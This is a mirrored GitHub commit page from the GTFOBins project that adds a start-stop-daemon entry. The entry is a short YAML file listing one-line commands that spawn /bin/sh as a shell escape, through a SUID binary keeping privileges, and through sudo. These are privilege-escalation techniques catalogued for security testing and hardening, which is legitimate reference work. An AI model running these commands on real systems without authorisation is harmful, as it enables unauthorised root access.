1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-04-14 10:59:02 +02:00

Add start-stop-daemon

This commit is contained in:
egre55 2018-11-05 15:34:57 +00:00 committed by Andrea Cardaci
parent ae79cfa550
commit 86e249e812

@ -0,0 +1,11 @@
---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
- code: |
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
sudo:
- code: |
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
---